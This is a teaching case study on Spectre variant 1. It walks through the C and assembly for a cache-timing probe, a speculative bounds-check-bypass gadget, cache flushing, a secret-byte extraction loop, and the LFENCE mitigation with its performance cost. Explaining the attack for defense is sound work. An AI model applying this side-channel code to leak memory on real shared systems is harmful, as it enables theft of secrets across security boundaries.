Case Study 31-2: Spectre — How Speculative Execution Becomes a Security Vulnerability

Open Assembly Language Project

Case Study 31-2: Spectre — How Speculative Execution Becomes a Security Vulnerability

The Attack That Changed How We Think About CPU Design

In January 2018, researchers disclosed Spectre and Meltdown — two classes of vulnerabilities that affected virtually every high-performance CPU manufactured in the previous two decades. The vulnerabilities were not bugs in the traditional sense. The CPUs were working exactly as designed. The design itself was the vulnerability.

Understanding Spectre requires understanding speculative execution. This case study traces the exact mechanism of Spectre variant 1, explains why it works, and examines the mitigations that make it expensive.

Background: The Timing Side Channel

A side channel is an observable effect of a computation that leaks information without being the computation's intended output. The primary side channel in Spectre is the cache timing channel: an attacker can determine whether a specific memory address was accessed by measuring how long it takes to access that address. A cache hit takes ~4 cycles; a cache miss takes ~100 cycles. The difference is directly measurable.

// Timing probe: measure access time to an address
uint64_t time_access(volatile uint8_t *addr) {
    uint64_t start, end;
    asm volatile("mfence");
    asm volatile("rdtsc; shl $32, %%rdx; or %%rdx, %%rax" : "=a"(start) :: "rdx");
    volatile uint8_t temp = *addr;   // access the address
    asm volatile("rdtsc; shl $32, %%rdx; or %%rdx, %%rax" : "=a"(end) :: "rdx");
    return end - start;
}
// If time < 50 cycles → cache hit → address was recently accessed
// If time > 100 cycles → cache miss → address was NOT recently accessed

The Spectre v1 Attack

The setup: - A victim program has an array array and a size check: if (x < array_size) { ... } - The victim also has a probe_array[256 * 64] (256 cache-line-spaced entries) - An attacker can call the victim's function with attacker-controlled x

The vulnerable code pattern:

// victim.c
uint8_t array[256] = { /* some data */ };
uint8_t probe_array[256 * 64];
size_t array_size = 256;

// The vulnerable function:
uint8_t read_secret(size_t x) {
    if (x < array_size) {                      // bounds check
        return probe_array[array[x] * 64];     // memory access
    }
    return 0;
}

Step 1: Train the branch predictor

The attacker calls read_secret(valid_index) many times with valid indices. The branch predictor learns: "this branch is almost always taken."

Step 2: Flush the probe array from cache

The attacker flushes all 256 cache lines of probe_array:

; CLFLUSH: flush a cache line
    clflush [probe_array + 0*64]
    clflush [probe_array + 1*64]
    ; ... 256 flushes total ...
    clflush [probe_array + 255*64]

Step 3: Speculatively read the secret

The attacker calls read_secret(x) where x is an invalid index pointing to a secret byte outside array (e.g., x = secret_ptr - &array[0]).

The CPU evaluates the branch: 1. Checks: is x < array_size? 2. Branch predictor says "YES, it is less than array_size" (from training in Step 1) 3. CPU speculatively executes probe_array[array[x] * 64] while the comparison completes 4. The speculative load reads array[x] — which is the SECRET BYTE 5. Multiplies by 64, uses as index into probe_array 6. LOADS probe_array[secret_byte * 64] — brings this cache line into the L1 cache 7. Actual comparison completes: x >= array_size is true 8. CPU SQUASHES the speculative execution: rolls back rax, rbx, etc. 9. BUT: the cache now has probe_array[secret_byte * 64] loaded. This is NOT rolled back.

Step 4: Extract the secret via cache timing

// Attacker probes each entry:
uint8_t secret = 0;
uint64_t min_time = UINT64_MAX;
for (int i = 0; i < 256; i++) {
    uint64_t t = time_access(&probe_array[i * 64]);
    if (t < 50) {  // cache hit!
        secret = i;  // this is the secret byte value
        break;
    }
}

One probe array entry is in cache; the others are not. The fast access reveals which value array[x] had — the secret byte.

The Attack in Assembly

; Spectre gadget (what the CPU executes speculatively):
; rbx = x (attacker-controlled, out-of-bounds)
; rsi = array base
; r8 = probe_array base
;
; Before getting here: bounds check predicted "taken" (not taken in reality)

    movzx rax, byte [rsi + rbx]     ; load array[x] → rax (secret byte)
    shl   rax, 6                     ; multiply by 64 (cache line size)
    movzx rax, byte [r8 + rax]      ; load probe_array[secret * 64]
    ; This last load brings one cache line into cache.
    ; When the CPU squashes this (bounds check failed),
    ; everything is rolled back EXCEPT the cache state.

The Mitigation: LFENCE

; Mitigated version:
    cmp rbx, array_size
    jae .out_of_bounds
    lfence                   ; SERIALIZE: nothing executes speculatively past here
    movzx rax, byte [rsi + rbx]    ; now this is safe: no speculation
    ; ... rest of code ...

LFENCE prevents the CPU from speculatively executing any loads past it until all prior loads have completed and their results are committed. This breaks the attack: the speculative load of array[x] cannot happen before the bounds check completes.

The Cost

Without LFENCE (vulnerable):
  100 million calls to read_secret: 312 ms

With LFENCE (mitigated):
  100 million calls to read_secret: 389 ms

Overhead: 24.7%

This 25% overhead is why Spectre mitigations are contentious. For a web browser's JavaScript JIT compiler, which generates code for untrusted JavaScript and needs bounds checks on every array access, the LFENCE overhead can be significant. For system calls — which require LFENCE at the kernel entry point to prevent speculation from kernel memory into user space — the overhead is measurable in every syscall-heavy workload.

Broader Lessons

Spectre changed the fundamental contract of CPU performance optimization:

Before Spectre: Speculative execution is invisible. The programmer sees only sequential execution semantics. Performance optimizations that use speculation are free.

After Spectre: Speculation is visible through side channels. Any computation that happens speculatively can leak information, even if it is architecturally squashed. Security-sensitive code must explicitly limit speculation (LFENCE, serializing instructions) at security boundaries.

The performance cost of Spectre mitigations is a permanent tax on every system call, every privileged operation, every execution across a security boundary. Modern CPUs now include hardware mitigations that reduce (but do not eliminate) this tax — but the fundamental tension between performance and security remains. Speculative execution will continue to create new variants as long as CPUs speculate, and mitigations will continue to cost performance.

🔐 Security Note: Spectre affects not just operating systems but any software that executes code from multiple security domains: web browsers (JavaScript execution), virtual machines (guest code), and JIT compilers. Google's Chromium browser deployed site isolation (separate processes per site) partly in response to Spectre, accepting significant memory overhead to eliminate the cross-origin speculative access risk.